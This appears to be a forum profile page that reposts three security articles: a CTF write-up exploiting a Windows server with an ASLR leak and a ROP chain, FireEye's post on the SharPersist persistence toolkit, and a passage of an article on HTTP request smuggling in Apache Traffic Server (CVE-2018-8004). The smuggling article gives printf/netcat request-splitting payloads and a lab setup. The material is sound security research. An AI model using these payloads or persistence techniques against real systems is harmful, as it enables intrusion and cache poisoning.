Jump to content

Nytro

Administrators
  • Posts

    18750
  • Joined

  • Last visited

  • Days Won

    723

Everything posted by Nytro

  1. Writeup for the BFS Exploitation Challenge 2019 Table of Contents Introduction TL;DR Initial Dynamic Analysis Statically Identifying the Vulnerability Strategy Preparing the Exploit Building a ROP Chain See Exploit in Action Contact Introduction Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I've decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge's goals were set to: Bypass ASLR remotely Achieve arbitrary code execution (pop calc or notepad) Have the exploited process properly continue its execution TL;DR Spare me all the boring details, I want to grab a copy of the challenge study the decompiled code study the exploit Initial Dynamic Analysis Running the file named 'eko2019.exe' opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking out the running process' security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further checking out the running process dynamically using tools such as Sysinternals TCPView, Process Monitor or simply running netstat could have been an option right now, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommended following along with your favourite disassembler / decompiler). Statically Identifying the Vulnerability Having disassembled the executable file and looking at the list of identified functions, the maximum number of functions that need to be analyzed for weaknesses was as little as 17 functions out of 188 in total - with the remaining ones being known library functions, imported functions and the main() function itself. Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is "size_payload" and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails in complying with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total. Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution. Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must probably have overlooked something and -yes you guessed it- it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number along with the header packet in "size_payload"! Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload" variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack beyond its intended limits. If we wanted to verify the decompiler's results or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code: the "jle" instruction indicates a signed integer comparison the "movzx eax, word ptr..." instruction moves 16 bits of data from a data source to a 32 bit register eax, zero extending its upper 16 bits. Alright, before we can start exploiting this vulnerability and take control of the server process' instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function's prologue in the disassembly, we can see there is a stack cookie that will be checked by the function's epilogue which eventually needs to be taken care of . Strategy In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine. These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data "gadget_buf" contains. The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41 which is passed the address of a global variable "g_gadget_array" as an argument. Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument, swaps its endianness and then returns the result to the caller. In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be executed by the call to exec_gadget() and its result is then sent back to the connected client. Looking at the cross references to "g_gadget_array" which is only initialized during run-time, we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of the server's main() function: Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized with 62, which means that a gadget pointed to by "p_gadget_array[62]" is executed by default. The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent to the "buf[512]" variable and thus can be written to by sending the server data that exceeds the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to be able to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server's initialization of "g_gadget_array" and then disassembles all its 256 elements using the Capstone Engine Python bindings: I spent quite some time reading the resulting list of gadgets trying to find a suitable gadget to be used for leaking a qualified pointer from the running process, but with partial success only. Knowing I must have been missing something, I still settled with a gadget that would manage to leak the lower 32 bits of a 64 bit pointer only, for the sake of progressing and then fixing it the other day: Using this gadget would modify the pointer that is passed to the call to exec_gadget(), making it point to a location other than what the "p" pointer usually points to, which could then be used to leak further data. Based on working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit including full process continuation. But it was only after a kind soul asked me whether I hadn't thought of reading from the TEB that I got on the right track to writing an exploit that is more than just quite stable. Thank you Preparing the Exploit The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64 bit Windows systems. Looking through the list of gadgets for any occurence of "gs:" yields a single hit at index 0x65 of the "g_gadget_array" pointer. Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to have the gadget that is shown in the screenshot above to do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the "p" variable on the stack. Like the "gadget_idx variable", "p" is adjacent to the overflowable buffer, hence overwritable as well. Great. By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data of the server thread's TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30. [0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00'] Sending this packet will overwrite the target thread's following variables on the stack and will cause the server to send us the current thread's TEB address: [buf] + [gadget_idx] + [p] The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process' TEB address leaked to us, we are well prepared for leaking further information by using the default gagdet 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request: In turn, leaking arbitrary memory allows us to bypass DEP and ASLR identify the stack cookie's position on the stack leak the stack cookie locate ourselves on the stack eventually run an external process In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired from the Process Environment Block which is accessible at gs:[060h]. This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API function, as well as the stack cookie's xor key can be leaked. What's still missing is a way of acquiring the stack cookie from the current thread's stack frame. Although I knew that the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text that is created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters with a size that would overflow the entire stack frame but stopping right before the stack cookie's position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text whose address had previously been acquired. While this might have been an interesting approach, it is an approach that is error-prone because if the cookie contained any null-bytes right in the middle, the call to printf() will make a partial copy of the cookie only which would have caused the exploit to become unreliable. Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB which is part of the TEB and walk the entire stack, starting from StackLimit, looking for the first occurence of the saved return address to main(). Relative from there, the cookie that belongs to the handle_client() function's stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand will allow the rsp register to be recovered, which can then be used to build the final ROP chain. Building a ROP Chain Now that we know how to leak all information from the vulnerable process that is required for building a fully working exploit, we can build a ROP chain and have it cause the server to pop calc. Using ROPgadget, a list of gadgets was created which was then used to craft the following chain: The ROP chain starts at "entry_point", which is located at offset 0x230 of the vulnerable function's "buf" variable and which previously contained the orignal return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp register which effectively lets rsp point into the next gadget at 2.). Stack pivoting is a vital step in order to avoid trashing the caller's stack frame. Messing up the caller's frame would risk stable process continuation This gadget loads the address of a "pop rax" gadget into r12 in preparation for a "workaround" that is required in order to compensate for the return address that is pushed onto the stack by the call r12 instruction in 4.). A pointer to "buf" is loaded into rax, which now points to the "calc\0" string The pointer to "calc\0" is copied to rcx which is the first argument for the subsequent API call to WinExec() in 5.). The call to r12 pushes a return address on the stack and causes a "pop rax" gadget to be executed which will pop the address off of the stack again This gadget causes the WinExec() API function to be called The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the call to WinExec() The original return address to main()+0x14a is loaded into rax rbx is loaded with the address of "entry_point" The original return address to main()+0x14a is restored by patching "entry_point" on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted, followed by a few dummy bytes rsp is adjusted so it will slowly slide into its old position at offset 0x230 of "buf", in order to return to main() and guarantee process continuation see 10.) see 10.) see 10.) See Exploit in Action Contact Twitter Sursa: https://github.com/patois/BFS2019
      • 1
      • Upvote
  2. Threat Research SharPersist: Windows Persistence Toolkit in C# September 03, 2019 | by Brett Hawkins powershell persistence Toolkit Windows Background PowerShell has been used by the offensive community for several years now but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist. Windows Persistence During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1. Figure 1: FireEye Attack Lifecycle Diagram Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and there continues to be more discovered. For a more thorough list, see the MITRE ATT&CK persistence page. Figure 2: Persistence equation SharPersist Overview SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page. SharPersist Persistence Techniques There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3. Technique Description Technique Switch Name (-t) Admin Privileges Required? Touches Registry? Adds/Modifies Files on Disk? KeePass Backdoor KeePass configuration file keepass No No Yes New Scheduled Task Creates new scheduled task schtask No No Yes New Windows Service Creates new Windows service service Yes Yes No Registry Registry key/value creation/modification reg No Yes No Scheduled Task Backdoor Backdoors existing scheduled task with additional action schtaskbackdoor Yes No Yes Startup Folder Creates LNK file in user startup folder startupfolder No No Yes Tortoise SVN Creates Tortoise SVN hook script tortoisesvn No Yes No Figure 3: Table of supported persistence techniques SharPersist Examples On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below. Registry Persistence The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4. Registry Key Code (-k) Registry Key Registry Value Admin Privileges Required? Supports Env Optional Add-On (-o env)? hklmrun HKLM\Software\Microsoft\Windows\CurrentVersion\Run User supplied Yes Yes hklmrunonce HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied Yes Yes hklmrunonceex HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx User supplied Yes Yes userinit HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit Yes No hkcurun HKCU\Software\Microsoft\Windows\CurrentVersion\Run User supplied No Yes hkcurunonce HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied No Yes logonscript HKCU\Environment UserInitMprLogonScript No No stickynotes HKCU\Software\Microsoft\Windows\CurrentVersion\Run RESTART_STICKY_NOTES No No Figure 4: Supported registry keys table In the following example, we will be performing a validation of our arguments and then will add registry persistence. Performing a validation before adding the persistence is a best practice, as it will make sure that you have the correct arguments, and other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key. Figure 5: Adding registry persistence Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed. Figure 6: Removing registry persistence Startup Folder Persistence The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7. Figure 7: Performing dry-run and adding startup folder persistence The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder. Figure 8: Removing startup folder persistence Scheduled Task Backdoor Persistence The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9. Figure 9: Listing scheduled tasks that run at logon Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10. Figure 10: Performing dry run and adding scheduled task backdoor persistence As you can see in Figure 11, the scheduled task is now backdoored with our malicious action. Figure 11: Listing backdoored scheduled task A backdoored scheduled task action used for persistence can be removed as shown in Figure 12. Figure 12: Removing backdoored scheduled task action Conclusion Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell. Sursa: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
      • 2
      • Upvote
      • Thanks
  3. Security: HTTP Smuggling, Apache Traffic Server Sept 17, 2019 english and security details of CVE-2018-8004 (August 2018 - Apache Traffic Server). What is this about ? Apache Traffic Server ? Fixed versions of ATS CVE-2018-8004 Step by step Proof of Concept Set-up the lab: Docker instances Test That Everything Works Request Splitting by Double Content-Length Request Splitting by NULL Character Injection Request Splitting using Huge Header, Early End-Of-Query Cache Poisoning using Incomplete Queries and Bad Separator Prefix Attack schema HTTP Response Splitting: Content-Length Ignored on Cache Hit Attack schema Timeline See also English version (Version Française disponible sur makina corpus). estimated read time: 15 min to really more What is this about ? This article will give a deep explanation of HTTP Smuggling issues present in CVE-2018-8004. Firstly because there's currently not much informations about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly some time has passed since the official announce (and even more since the availability of fixs in v7), also mostly because I keep receiving demands on what exactly is HTTP Smuggling and how to test/exploit this type of issues, also beacause Smuggling issues are now trending and easier to test thanks for the great stuff of James Kettle (@albinowax). So, this time, I'll give you not only details but also a step by step demo with some DockerFiles to build your own test lab. You could use that test lab to experiment it with manual raw queries, or test the recently added BURP Suite Smuggling tools. I'm really a big partisan of always searching for Smuggling issues in non production environements, for legal reasons and also to avoid unattended consequences (and we'll see in this article, with the last issue, that unattended behaviors can always happen). Apache Traffic Server ? Apache Traffic Server, or ATS is an Open Source HTTP load balancer and Reverse Proxy Cache. Based on a Commercial product donated to the Apache Foundation. It's not related to Apache httpd HTTP server, the "Apache" name comes from the Apache foundation, the code is very different from httpd. If you were to search from ATS installations on the wild you would find some, hopefully fixed now. Fixed versions of ATS As stated in the CVE announce (2018-08-28) impacted ATS versions are versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released in 2018-08-02 and 6.2.3 in 2018-08-04. That's the offical announce, but I think 7.1.3 contained most of the fixs already, and is maybe not vulnerable. The announce was mostly delayed for 6.x backports (and some other fixs are relased in the same time, on other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out of support versions. CVE-2018-8004 The official CVE description is: There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS. Which does not gives a lot of pointers, but there's much more information in the 4 pull requests listed: #3192: Return 400 if there is whitespace after the field name and before the colon #3201: Close the connection when returning a 400 error response #3231: Validate Content-Length headers for incoming requests #3251: Drain the request body if there is a cache hit If you already studied some of my previous posts, some of these sentences might already seems dubious. For example not closing a response stream after an error 400 is clearly a fault, based on the standards, but is also a good catch for an attacker. Chances are that crafting a bad messages chain you may succeed at receiving a response for some queries hidden in the body of an invalid request. The last one, Drain the request body if there is a cache hit is the nicest one, as we will see on this article, and it was hard to detect. My original report listed 5 issues: HTTP request splitting using NULL character in header value HTTP request splitting using huge header size HTTP request splitting using double Content-length headers HTTP cache poisoning using extra space before separator of header name and header value HTTP request splitting using ...(no spoiler: I keep that for the end) Step by step Proof of Concept To understand the issues, and see the effects, We will be using a demonstration/research environment. If you either want to test HTTP Smuggling issues you should really, really, try to test it on a controlled environment. Testing issues on live environments would be difficult because: You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your success and errors. You may triggers errors and behaviors that you have no idea about, for example I have encountered random errors on several fuzzing tests (on test envs), unreproductible, before understanding that this was related to the last smuggling issue we will study on this article. Effects were delayed on subsequent tests, and I was not in control, at all. You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self reflected XSS, you could end up in a court for that. Real life complete examples usually occurs with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interact with the other, and you will see it faster with a local low level network capture than blindly accross an unknown chain of agents (like for example to learn how to detect each agent on this chain). So it's very important to be able to rebuild a laboratory env. And, if you find something, this env can then be used to send detailled bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues, a working demo helps). Set-up the lab: Docker instances We will run 2 Apache Traffic Server Instance, one in version 6.x and one in version 7.x. To add some alterity, and potential smuggling issues, we will also add an Nginx docker, and an HaProy one. 4 HTTP actors, each one on a local port: 127.0.0.1:8001 : HaProxy (internally listening on port 80) 127.0.0.1:8002 : Nginx (internally listening on port 80) 127.0.0.1:8007 : ATS7 (internally listening on port 8080) 127.0.0.1:8006 : ATS6 (internally listening on port 8080), most examples will use ATS7, but you will ba able to test this older version simply using this port instead of the other (and altering the domain). We will chain some Reverse Proxy relations, Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6) Note that the localhost port mapping of the ATS and Nginx instances are not directly needed, if you can inject a request to Haproxy it will reach Nginx internally, via port 8080 of one of the ATS, and port 80 of Nginx. But that could be usefull if you want to target directly one of the server, and we will have to avoid the HaProxy part on most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to suceed targeting 8001, that will be harder. +---[80]---+ | 8001->80 | | HaProxy | | | +--+---+---+ [dummy-host6.example.com] | | [dummy-host7.example.com] +-------+ +------+ | | +-[8080]-----+ +-[8080]-----+ | 8006->8080 | | 8007->8080 | | ATS6 | | ATS7 | | | | | +-----+------+ +----+-------+ | | +-------+-------+ | +--[80]----+ | 8002->80 | | Nginx | | | +----------+ To build this cluster we will use docker-compose, You can the find the docker-compose.yml file here, but the content is quite short: version: '3' services: haproxy: image: haproxy:1.6 build: context: . dockerfile: Dockerfile-haproxy expose: - 80 ports: - "8001:80" links: - ats7:linkedats7.net - ats6:linkedats6.net depends_on: - ats7 - ats6 ats7: image: centos:7 build: context: . dockerfile: Dockerfile-ats7 expose: - 8080 ports: - "8007:8080" depends_on: - nginx links: - nginx:linkednginx.net ats6: image: centos:7 build: context: . dockerfile: Dockerfile-ats6 expose: - 8080 ports: - "8006:8080" depends_on: - nginx links: - nginx:linkednginx.net nginx: image: nginx:latest build: context: . dockerfile: Dockerfile-nginx expose: - 80 ports: - "8002:80" To make this work you will also need the 4 specific Dockerfiles: Docker-haproxy: an HaProxy Dockerfile, with the right conf Docker-nginx: A very simple Nginx Dockerfile with one index.html page Docker-ats7: An ATS 7.1.1 compiled from archive Dockerfile Docker-ats6: An ATS 6.2.2 compiled from archive Dockerfile Put all theses files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir: docker-compose build && docker-compose up You can now take a big break, you are launching two compilations of ATS. Hopefully the next time a up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element on the cluster, to test fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions. Test That Everything Works We will run basic non attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run HTTP query, because that would be impossible to write bad queries. So we need to use low level string manipulations (with printf for example) and socket handling (with netcat -- or nc --). Test Nginx (that's a one-liner splitted for readability): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8002 You should get the index.html response, something like: HTTP/1.1 200 OK Server: nginx/1.15.5 Date: Fri, 26 Oct 2018 15:28:20 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT Connection: keep-alive ETag: "5bd321bc-78" X-Location-echo: / X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Then test ATS7 and ATS6: printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8007 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8006 Then test HaProxy, altering the Host name should make the transit via ATS7 or ATS6 (check the Server: header response): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 And now let's start a more complex HTTP stuff, we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks: # send one pipelined chain of queries printf 'GET /?cache=1 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=2 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=3 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ 'GET /?cache=4 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 This is pipelining, it's not only using HTTP keepAlive, because we send the chain of queries without waiting for the responses. See my previous post for detail on Keepalives and Pipelining. You should get the Nginx access log on the docker-compose output, if you do not rotate some arguments in the query nginx wont get reached by your requests, because ATS is caching the result already (CTRL+C on the docker-compose output and docker-compose up will remove any cache). Request Splitting by Double Content-Length Let's start a real play. That's the 101 of HTTP Smuggling. The easy vector. Double Content-Length header support is strictly forbidden by the RFC 7230 3.3.3 (bold added): 4 If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response. Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005). Sending such query directly on ATS generates 2 responses (one 400 and one 200): printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Content-Length: 0\r\n'\ 'Content-Length: 66\r\n'\ '\r\n'\ 'GET /index.html?toto=2 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 The regular response should be one error 400. Using port 8001 (HaProxy) would not work, HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is Critical Request Splitting, classical, but hard to reproduce in real life environment if some robust tools are used on the reverse proxy chain. So, why critical? Because you could also consider ATS to be robust, and use a new unknown HTTP server behind or in front of ATS and expect such smuggling attacks to be properly detected. And there is another factor of criticality, any other issue on HTTP parsing can exploit this Double Content-Length. Let's say you have another issue which allows you to hide one header for all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-length and you're done, without being blocked by a previous actor. On our current case, ATS, you have one example of such hidden-header issue with the 'space-before-:' that we will analyze later. Request Splitting by NULL Character Injection This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after), that's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte character in a header triggers a query rejection on ATS, that's ok, but also a premature end of query, and if you do not close pipelines after a first error, bad things could happen. Next line is interpreted as next query in pipeline. So, a valid (almost, if you except the NULL character) pipeline like this one: 01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 X-Foo: Bar\r\n 04 \r\n 05 GET /index.html?bar=1 HTTP/1.1\r\n 06 Host: dummy-host7.example.com\r\n 07 \r\n Generates 2 error 400. because the second query is starting with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there'is no \r\n between the 2 queries): 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 GET /index.html?bar=2 HTTP/1.1\r\n 04 Host: dummy-host7.example.com\r\n 05 \r\n It generates 1 error 400 and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request Splitting attack. But line 03 is a really bad header line that most agent would reject. You cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query, I mean line 03 is clearly not a valid header line. GET /index.html?bar=2 HTTP/1.1\r\n != <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF] For the first line the syntax is one of these two lines: <METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF] <METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri) LOCATION may be used to inject the special [:] that is required in an header line, especially on the query string part, but this would inject a lot of bad characters in the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try with the ABSOLUTE-URI alternative syntax, where the [:] comes faster on the line, and the only bad character for an Header name would be the space. This will also fix the potential presence of the double Host header (absolute uri does replace the Host header). 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 X-Something: \0 something\r\n 04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n 05 \r\n Here the bad header which becomes a query is line 04, and the header name is GET http with an header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space) but I'm pretty sure we could find some HTTP agent transferring this header (ATS is one proof of that, space character in header names were allowed). A real attack using this trick will looks like this: printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-Something: "\0something"\r\n'\ 'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\ '\r\n'\ 'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 This is just 2 queries (1st one has 2 bad header, one with a NULL, one with a space in header name), for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: added by Nginx. After that ATS adds a thirsr response, a 404, but the previous actor expects only 2 responses, and the second response is already replaced. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:34:53 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 